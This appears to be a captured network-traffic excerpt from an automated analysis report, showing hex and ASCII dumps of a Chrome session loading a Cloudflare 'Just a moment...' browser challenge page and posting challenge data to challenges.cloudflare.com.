                                    2024-05-22 15:09:05 UTC705INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:09:05 UTC1369INData Raw: 7d 62 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a
                                    Data Ascii: }body a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:
                                    2024-05-22 15:09:05 UTC1369INData Raw: 3a 31 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63
                                    Data Ascii: :100vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-c
                                    2024-05-22 15:09:05 UTC1369INData Raw: 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30
                                    Data Ascii: wNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730
                                    2024-05-22 15:09:05 UTC1369INData Raw: 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61
                                    Data Ascii: S41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transpa
                                    2024-05-22 15:09:05 UTC1369INData Raw: 44 45 7a 4c 6a 41 78 4e 53 41 77 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74
                                    Data Ascii: DEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQt
                                    2024-05-22 15:09:05 UTC1369INData Raw: 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65
                                    Data Ascii: or:#003681;color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table
                                    2024-05-22 15:09:05 UTC1369INData Raw: 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c
                                    Data Ascii: and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #chal
                                    2024-05-22 15:09:05 UTC1369INData Raw: 56 42 48 63 64 69 59 45 66 43 6c 39 32 4a 69 5a 63 56 5f 51 67 79 66 36 44 71 63 6a 6a 75 4e 57 59 4e 57 53 4f 51 57 48 59 57 47 33 4a 70 42 55 61 71 45 63 71 6c 44 70 77 41 42 4c 72 6c 73 58 64 4e 6c 63 7a 76 79 4d 39 70 6b 47 7a 44 4c 51 74 7a 64 58 56 65 58 61 41 78 35 4c 36 4d 31 31 50 73 77 47 42 49 46 36 54 61 70 56 5f 53 6e 59 4a 6b 4d 75 45 77 4e 32 6e 44 67 65 73 72 5f 62 62 77 73 4b 2e 6e 56 5f 51 75 30 38 47 55 54 32 6f 5f 4e 61 79 45 4a 5a 61 59 57 70 77 72 59 38 73 70 75 50 67 6e 79 48 39 48 6c 35 49 6d 54 61 71 5f 63 5a 53 34 5f 31 69 4a 35 37 4d 4c 67 77 33 35 78 55 66 4c 76 6d 77 4b 78 68 73 54 62 31 6e 38 31 56 66 65 46 4f 36 30 64 48 77 64 38 4a 54 43 41 30 7a 61 65 4f 39 66 38 42 59 31 41 73 49 50 33 51 70 4d 4b 55 65 59 43 7a 31 71 50
                                    Data Ascii: VBHcdiYEfCl92JiZcV_Qgyf6DqcjjuNWYNWSOQWHYWG3JpBUaqEcqlDpwABLrlsXdNlczvyM9pkGzDLQtzdXVeXaAx5L6M11PswGBIF6TapV_SnYJkMuEwN2nDgesr_bbwsK.nV_Qu08GUT2o_NayEJZaYWpwrY8spuPgnyH9Hl5ImTaq_cZS4_1iJ57MLgw35xUfLvmwKxhsTb1n81VfeFO60dHwd8JTCA0zaeO9f8BY1AsIP3QpMKUeYCz1qP


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.449783104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:05 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67 HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    Content-Length: 3658
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    Content-type: application/x-www-form-urlencoded
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    CF-Challenge: e2c69a9cf6a5b67
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Origin: https://challenges.cloudflare.com
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:05 UTC3658OUTData Raw: 76 5f 38 38 37 64 62 39 39 36 32 39 34 34 37 38 65 31 3d 43 69 54 6a 6d 6a 6b 48 77 35 55 49 54 2d 69 38 34 61 77 71 77 62 77 24 6a 38 76 6a 30 6b 39 32 49 38 77 74 4a 50 77 43 39 2d 52 77 63 74 77 32 53 4c 77 2d 68 64 4b 55 71 77 55 79 31 77 4a 6b 77 68 77 35 54 55 68 7a 53 39 5a 61 50 77 2d 41 2d 77 37 6a 59 53 74 77 7a 53 30 52 66 77 42 39 55 4b 77 4a 39 55 2d 77 4d 76 74 6d 66 77 32 38 55 76 43 38 4b 25 32 62 6a 31 76 49 77 59 4c 41 79 77 73 79 7a 6f 51 77 5a 6a 65 56 4e 68 77 4a 75 74 58 77 5a 6d 2b 4f 54 54 6e 50 4e 77 56 35 6c 6b 64 6f 63 42 50 4b 4c 6a 31 6a 77 30 39 48 2d 61 2d 31 32 53 77 31 54 77 6c 6a 55 74 77 55 57 77 57 53 4e 54 57 32 38 77 75 53 6c 4e 41 72 58 52 66 32 37 6d 32 50 6c 61 43 35 6d 47 38 38 77 42 48 4d 59 49 68 49 72 2d 36 62
                                    Data Ascii: v_887db996294478e1=CiTjmjkHw5UIT-i84awqwbw$j8vj0k92I8wtJPwC9-Rwctw2SLw-hdKUqwUy1wJkwhw5TUhzS9ZaPw-A-w7jYStwzS0RfwB9UKwJ9U-wMvtmfw28UvC8K%2bj1vIwYLAywsyzoQwZjeVNhwJutXwZm+OTTnPNwV5lkdocBPKLj1jw09H-a-12Sw1TwljUtwUWwWSNTW28wuSlNArXRf27m2PlaC5mG88wBHMYIhIr-6b
                                    2024-05-22 15:09:05 UTC751INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:05 GMT
                                    Content-Type: text/plain; charset=UTF-8
                                    Content-Length: 131356
                                    Connection: close
                                    cf-chl-gen: G/UM3BAAO5cqDMFqQqr3gMW3e7jImb4qH5/W//nVtju7ILjn/kKNDflx82i+INz42NEHdpPm9Te6Gq7GqoTxPEXaSv4PuOoYXS8N3FUKZjXGPafLObddgkAJdrj+V93WxT5sVWM7yAvcpgZuLi3rP48WoKulwEzEBGLDzne4keSBJEoqBdiAzwVw+7N4PzPFjM5wQD0iC+HuOmfeZI7Y+n/+7bEd9/3+mw74Rght0AWGDHgoXGJMlQw90+62IKdo/0yIaazVLnC/P778Cm7B8rbR9ipXIK95DUeVVG35E7iGC2sfnemjmZQEkNmPPBE1fccdBj03/En5V7tWkg05dULwPJWjN5/RfAZXMgevv+wTOUm4mWS3Vg83QNgDdMld1mSFgZQyL/CUGOJzcPcWJ/2sotNikyXNrwr+wTdcNLE/m4rL1wMZOmZ544klaplIRYchvc1dkt/dvzUoqi7s05IMrmBtTWFWHmMkzvZvi0k=$xUDSz939GS5a4+fWLs9xcQ==
                                    Server: cloudflare
                                    CF-RAY: 887db9ab496d8c42-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:05 UTC618INData Raw: 54 55 31 50 69 49 47 55 5a 32 56 68 54 4a 4b 51 64 31 74 33 56 70 2b 4b 56 5a 79 67 65 4a 78 78 6f 48 52 6f 66 49 74 73 66 62 47 72 6e 4b 43 6a 72 4b 79 6e 6c 5a 6d 4b 6a 35 53 49 6c 6f 65 64 6a 72 4e 37 73 72 50 48 6b 61 4f 58 74 35 4f 65 6c 63 32 6b 6f 36 57 67 70 61 79 71 71 63 79 6c 32 4e 4c 51 71 64 32 78 6b 62 6a 58 76 36 7a 69 73 74 50 63 6d 72 62 58 33 62 69 33 74 38 75 39 72 38 6d 38 7a 4d 53 32 77 76 6e 77 32 66 50 47 36 72 6a 79 2f 72 6a 4c 77 64 7a 45 37 74 44 47 38 39 6e 42 35 4e 7a 35 32 73 66 2b 38 64 4d 54 43 4f 62 74 35 77 66 57 45 67 34 4f 46 52 49 57 44 50 33 7a 45 2f 62 67 47 69 50 69 49 79 58 65 33 77 45 6d 2b 4f 76 70 36 78 55 54 45 79 38 4d 47 41 63 46 47 52 72 32 4d 67 6b 5a 44 78 73 78 45 68 63 61 49 79 6a 38 46 2f 34 57 50 45 6b
                                    Data Ascii: TU1PiIGUZ2VhTJKQd1t3Vp+KVZygeJxxoHRofItsfbGrnKCjrKynlZmKj5SIloedjrN7srPHkaOXt5Oelc2ko6Wgpayqqcyl2NLQqd2xkbjXv6zistPcmrbX3bi3t8u9r8m8zMS2wvnw2fPG6rjy/rjLwdzE7tDG89nB5Nz52sf+8dMTCObt5wfWEg4OFRIWDP3zE/bgGiPiIyXe3wEm+Ovp6xUTEy8MGAcFGRr2MgkZDxsxEhcaIyj8F/4WPEk
                                    2024-05-22 15:09:05 UTC1369INData Raw: 31 67 51 47 5a 66 47 53 56 48 4a 55 4a 48 52 45 52 64 4f 30 70 77 54 6a 52 71 61 44 41 33 63 54 59 33 61 45 68 72 65 30 42 4b 67 44 75 43 62 7a 36 43 51 49 68 4b 65 49 6d 43 61 45 68 69 54 6b 36 43 62 6d 52 50 69 32 64 70 56 34 74 37 6a 48 78 52 6c 47 32 57 58 58 52 78 68 4b 65 44 64 61 70 6c 67 61 36 61 61 4b 43 4d 68 57 57 70 6f 4b 2b 4f 71 6e 47 55 69 5a 5a 32 64 72 32 32 6b 34 47 78 6a 33 32 76 70 37 6e 4a 78 4b 43 43 68 5a 61 64 76 36 6d 4a 71 71 4f 74 77 59 6d 77 6c 64 76 62 30 36 75 34 33 4d 2f 50 33 4c 76 5a 31 4c 65 69 34 39 72 56 70 71 71 73 77 75 58 66 30 74 7a 6f 78 75 61 76 79 4f 76 77 34 73 33 70 35 73 69 33 30 4c 77 44 34 77 54 44 34 41 62 58 78 75 54 34 79 73 6a 6f 77 51 4c 4d 37 4d 58 76 30 50 44 4e 34 39 54 30 32 77 37 59 2b 4e 2f 37 33
                                    Data Ascii: 1gQGZfGSVHJUJHRERdO0pwTjRqaDA3cTY3aEhre0BKgDuCbz6CQIhKeImCaEhiTk6CbmRPi2dpV4t7jHxRlG2WXXRxhKeDdaplga6aaKCMhWWpoK+OqnGUiZZ2dr22k4Gxj32vp7nJxKCChZadv6mJqqOtwYmwldvb06u43M/P3LvZ1Lei49rVpqqswuXf0tzoxuavyOvw4s3p5si30LwD4wTD4AbXxuT4ysjowQLM7MXv0PDN49T02w7Y+N/73
                                    2024-05-22 15:09:05 UTC1369INData Raw: 6b 49 45 68 48 52 6a 6b 70 61 47 6b 76 57 7a 35 56 56 57 42 48 4e 58 68 49 55 6a 74 2b 62 30 67 2f 64 55 31 2b 57 58 35 62 64 47 70 70 5a 57 32 4a 51 49 39 4a 59 6e 71 4d 6a 59 74 67 6a 35 65 50 56 58 4e 71 6e 6f 35 6f 6a 57 78 78 64 4a 2b 53 65 48 5a 36 6f 49 71 65 6a 4b 4e 36 6d 59 79 68 70 34 4f 4e 6e 36 79 42 67 4c 4f 52 69 4c 70 30 73 35 47 58 74 33 6d 56 6e 73 47 56 6b 72 69 6a 67 38 4f 73 76 61 48 42 68 72 75 78 69 35 44 4b 79 63 65 30 31 4b 36 34 72 37 44 64 6e 64 6a 51 74 64 6d 77 75 2b 53 67 30 70 2f 4a 70 63 76 67 32 75 48 43 34 4d 6a 77 76 73 54 57 74 4f 33 34 73 65 33 62 79 2f 69 34 31 76 37 4b 7a 73 44 6a 38 50 7a 5a 35 2f 49 43 33 62 2f 73 41 73 77 47 41 51 62 50 43 2f 55 49 2b 66 66 34 45 75 33 7a 2f 42 58 62 48 68 45 57 34 41 51 46 45 79
                                    Data Ascii: kIEhHRjkpaGkvWz5VVWBHNXhIUjt+b0g/dU1+WX5bdGppZW2JQI9JYnqMjYtgj5ePVXNqno5ojWxxdJ+SeHZ6oIqejKN6mYyhp4ONn6yBgLORiLp0s5GXt3mVnsGVkrijg8OsvaHBhruxi5DKyce01K64r7DdndjQtdmwu+Sg0p/Jpcvg2uHC4MjwvsTWtO34se3by/i41v7KzsDj8PzZ5/IC3b/sAswGAQbPC/UI+ff4Eu3z/BXbHhEW4AQFEy
                                    2024-05-22 15:09:05 UTC1369INData Raw: 62 6d 74 6d 4d 54 35 53 4e 6d 5a 57 54 6e 67 36 4f 58 5a 32 57 6a 78 2f 50 7a 70 42 67 55 61 45 63 44 75 42 67 30 64 75 6a 49 56 39 5a 59 5a 39 64 58 35 51 56 56 52 6d 6a 4a 75 46 6b 6c 56 70 63 4a 79 51 6b 5a 4e 6b 6a 6e 56 30 65 61 53 4d 6c 71 6c 67 69 33 70 76 70 32 31 72 68 6d 32 66 6d 61 79 57 6f 35 43 33 72 4c 31 34 72 38 4f 59 74 49 53 51 68 5a 4b 6d 6e 61 4c 47 66 38 71 4c 6b 4a 47 64 76 71 4c 4a 74 37 53 6d 79 71 32 72 72 35 57 76 74 4c 76 50 6d 4c 6a 6c 78 62 43 6c 73 73 61 39 77 75 61 71 36 71 75 77 73 62 37 65 77 75 6e 58 31 4d 62 71 7a 63 76 50 2b 4e 58 56 38 66 65 36 32 51 45 45 76 74 6e 35 32 51 6a 64 36 4e 58 59 7a 64 72 63 7a 67 37 64 34 2b 41 41 2b 50 66 6f 32 52 66 73 47 74 37 78 49 66 67 59 37 77 34 6d 4a 50 76 37 36 43 6b 6e 44 4f 77
                                    Data Ascii: bmtmMT5SNmZWTng6OXZ2Wjx/PzpBgUaEcDuBg0dujIV9ZYZ9dX5QVVRmjJuFklVpcJyQkZNkjnV0eaSMlqlgi3pvp21rhm2fmayWo5C3rL14r8OYtISQhZKmnaLGf8qLkJGdvqLJt7Smyq2rr5WvtLvPmLjlxbClssa9wuaq6quwsb7ewunX1MbqzcvP+NXV8fe62QEEvtn52Qjd6NXYzdrczg7d4+AA+Pfo2RfsGt7xIfgY7w4mJPv76CknDOw
                                    2024-05-22 15:09:05 UTC1369INData Raw: 69 6b 31 52 57 4e 37 61 6a 52 38 61 30 67 38 4f 6c 64 4e 52 48 68 39 67 56 74 63 51 58 2b 4b 56 34 74 4d 57 34 42 69 59 6d 5a 2f 6c 32 2b 49 64 48 4e 71 6d 57 5a 31 56 33 69 4f 64 70 56 75 64 70 43 6a 6f 57 4b 70 67 35 6d 67 67 34 71 75 6b 49 79 6b 66 5a 5a 79 67 72 69 44 70 34 6d 62 63 4c 71 71 6f 4c 69 2f 72 5a 4f 41 78 37 65 35 6f 37 71 57 7a 4a 62 4c 76 5a 79 75 73 72 47 51 7a 37 4f 50 31 4d 69 6d 32 4c 47 62 79 63 75 31 32 4c 62 6a 77 37 43 33 33 64 32 31 77 38 71 2b 34 4f 6e 6f 37 4d 2f 79 34 36 7a 57 73 66 62 4e 2b 72 72 38 76 4d 6d 78 2b 63 71 37 41 66 50 59 77 74 37 33 33 4d 6e 69 2b 2b 44 48 35 67 44 6b 79 75 6f 45 36 4e 48 56 34 2b 62 58 32 67 73 58 48 50 66 38 49 50 37 64 46 74 73 58 4a 69 4c 32 41 78 38 6c 46 2b 33 2b 48 2f 48 70 42 79 63 42
                                    Data Ascii: ik1RWN7ajR8a0g8OldNRHh9gVtcQX+KV4tMW4BiYmZ/l2+IdHNqmWZ1V3iOdpVudpCjoWKpg5mgg4qukIykfZZygriDp4mbcLqqoLi/rZOAx7e5o7qWzJbLvZyusrGQz7OP1Mim2LGbycu12Lbjw7C33d21w8q+4Ono7M/y46zWsfbN+rr8vMmx+cq7AfPYwt733Mni++DH5gDkyuoE6NHV4+bX2gsXHPf8IP7dFtsXJiL2Ax8lF+3+H/HpBycB
                                    2024-05-22 15:09:05 UTC1369INData Raw: 70 75 67 46 4a 32 64 7a 35 2f 68 6e 57 48 59 6f 42 7a 5a 34 4e 70 68 6c 39 65 61 35 4e 64 61 59 2b 57 61 56 42 71 69 6d 32 4d 64 57 36 51 62 6d 74 76 63 47 53 51 67 47 4e 6a 61 5a 36 4d 6e 71 69 6b 6f 61 4e 71 68 6f 68 30 63 36 75 30 73 48 65 75 70 59 79 39 69 70 57 52 66 4c 47 54 6a 62 2b 37 6c 72 65 36 69 4a 71 38 72 62 6d 62 76 35 44 44 6f 5a 33 50 77 61 62 4e 75 61 4b 4e 78 5a 53 58 71 5a 71 75 33 72 61 77 31 4c 71 76 34 64 66 49 34 4f 54 44 7a 4f 4f 74 7a 2b 50 6e 78 61 37 51 74 2f 57 7a 74 76 69 38 2f 50 4c 64 33 74 76 39 2f 51 4c 61 76 51 44 63 78 2b 59 43 34 77 59 4e 33 4d 33 36 42 77 4d 57 41 68 66 77 42 63 2f 6f 46 4e 6b 54 37 74 34 59 32 66 59 50 4a 4f 41 63 33 53 58 6b 48 77 44 34 4c 50 67 73 2b 51 77 69 4b 52 62 79 46 79 2f 30 39 68 73 73 44
                                    Data Ascii: pugFJ2dz5/hnWHYoBzZ4Nphl9ea5NdaY+WaVBqim2MdW6QbmtvcGSQgGNjaZ6MnqikoaNqhoh0c6u0sHeupYy9ipWRfLGTjb+7lre6iJq8rbmbv5DDoZ3PwabNuaKNxZSXqZqu3raw1Lqv4dfI4OTDzOOtz+Pnxa7Qt/Wztvi8/PLd3tv9/QLavQDcx+YC4wYN3M36BwMWAhfwBc/oFNkT7t4Y2fYPJOAc3SXkHwD4LPgs+QwiKRbyFy/09hssD
